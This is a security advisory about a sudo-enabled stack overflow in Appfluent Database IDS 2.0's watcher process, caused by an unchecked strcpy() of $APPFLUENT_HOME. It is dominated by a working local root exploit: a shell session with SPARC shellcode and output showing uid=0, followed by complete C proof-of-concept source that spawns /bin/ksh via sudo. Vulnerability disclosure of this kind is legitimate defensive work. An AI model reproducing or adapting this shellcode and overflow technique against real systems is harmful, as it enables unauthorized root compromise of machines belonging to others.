|
|
|
|
| |
"Appfluent Technology provides a suite of data usage and query performance software designed to help IT organizations reduce the number of databases they maintain, improve performance of Business Intelligence (BI) and enterprise applications, and quickly deploy new applications."
Improper length validation allows local attackers to craft special content to Appfluent's System Variable, allowing them to cause the program to execute arbitrary code with root privileges. |
| |
Credit:
The information has been provided by c0ntex.
The original article can be found at: http://www.open-security.org/advisories/14
|
| |
Vulnerable Systems:
* Appfluent Database IDS version 2.0
Immune Systems:
* Appfluent Database IDS version 2.1.0.103
Appfluent provide a Database IDS system that monitors all SQL traffic in real time, logging every user defined transaction to a database, providing an audit trail of all transactions that take place. There are several processes that cumulate together to provide the IDS solution, including watcher, analyzer, alerter and reporter.
There is a stack based buffer overflow in all binaries that allow for malicious attacker to gain unauthorized code execution on the system where the application is installed. Due to incorrect use of strcpy(), and a lack of correct bounds checking, a user can manipulate the $APPFLUENT_HOME environment variable to overflow the stack buffer.
The problem is specific to the watcher process, as it needs to be run as root due to the fact that it sniffs all traffic going to an interface. A script installed in $APPFLUENT_HOME/server_oracle/bin is supplied so that administrators can run the process via sudo.
When run with sudo, we are provided a vector for root compromise as a default sudo install on many operating systems that honor the setting of environment variables. As such, when an attacker crafts $APPFLUENT_HOME in a malicious manner and runs the watcher process, root access to the system is gained.
There are a few requirements that need to be met for the attack to be successful, and they include:
1) User is in the sudoers file and is defined as able to run the watcher process
2) Sudo honors environment variables, meaning env_reset or the likes is not set
Please note that users must set, or have $APPFLUENT_HOME set for the product to work, and if the above two requirements are met, an attacker is guaranteed to gain unauthorized root access to the system.
Proof of Concept:
/*###
## Proof run with a default sudo install from sunfreeware.
###
[c0ntex@ ~/vuln]$ export SHELLCODE=`printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\x90\x90\x82\x10\x20\x18\x91\xd0\x20\x08\x90\x02\x60\x01\x90\x22\x20\x01\x92\x10\x3f
\xff\x82\x10\x20\xca\x91\xd0\x20\x08\x82\x10\x20\x2f\x91\xd0\x20\x08\x90\x02\x60\x01
\x90\x22\x20\x01\x92\x10\x3f\xff\x82\x10\x20\xcb\x91\xd0\x20\x08\x94\x1a\x80\x0a\x21
\x0b\xd5\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23
\xbf\xf8\xe0\x23\xbf\xf4\x90\x23\xa0\x0c\xd4\x23\xbf\xfd\xd0\x23\xbf\xec\x92\x23\xa0
\x14\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08"`
[c0ntex@ ~/vuln]$ export APPFLUENT_HOME=`perl -e 'print "A" x 576'``printf "\xff\xbe
\xfa\xd0\xff\xbe\xfa\xd0"`
[c0ntex@ ~/vuln]$ sudo /tmp/watch/watcher -sc
Password:
Version: 2.0.0.103
do_process: Exception:
file: file_stream.cpp
line: 338
message: FileStream: fopen : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA oracle
/config/config : 78 : File name too long
code: 78
stack:
#0 void IC::ConfigFile::load(IC::StrP) at config_file.cpp:35
#1 virtual void IC::ServerConfig::load() at /home/ask/lab/v2_0/app/product/server/l
ib/libserverconfig/server_config.cpp:70
#2 virtual void IC::Watch::run(bool, bool) at /home/ask/lab/v2_0/app/product/server
/lib/libwatch/watch.cpp:41
#3 int do_process(bool) at /home/ask/lab/v2_0/app/product/server/bin/watch/do_proce
ss.cpp:21
#
#
# uname -a
SunOS 5.8 Generic_117350-24 sun4u sparc SUNW,UltraAX-i2
#
# id -a
uid=0(root) gid=1(other) groups=1(other),0(root),2(bin),3(sys),4(adm),5(uucp),6(mail
),7(tty),8(lp),9(nuucp),12(daemon)
#
Greetings to everyone I know ;-)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define DAHBUF 591
#define NOP 0x90
#define SUDO "/usr/local/bin/sudo"
#define VULN "watcher"
#define WOPT "-sc"
char shellcode[] = "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
char retloc[] = "\xff\xbe\xfd\xe9";
char retlok[] = "\xff\xbe\xfd\xed";
int main()
{
char env[DAHBUF+9];
puts("\nLocal root proof of concept for Appfluent IDS Watcher environment overflow");
puts("found and developed by c0ntex || c0ntexb@gmail.com || www.open-security.org\n");
memset(env, NOP, DAHBUF);
memcpy(env + 100, shellcode, strlen(shellcode));
memcpy(env + DAHBUF, retloc, strlen(retloc));
memcpy(env + DAHBUF + 4, retlok, strlen(retlok));
env[DAHBUF+9] = '\0';
strncpy(&env[0], "APPFLUENT_HOME=", 15);
if(!env) {
puts("barfed!");
return(EXIT_FAILURE);
}
putenv(env);
if(execl(SUDO, SUDO, VULN, WOPT, NULL) < 0) {
perror("execle");
return(EXIT_FAILURE);
}
return(EXIT_SUCCESS);
}
|
|
|
|
|
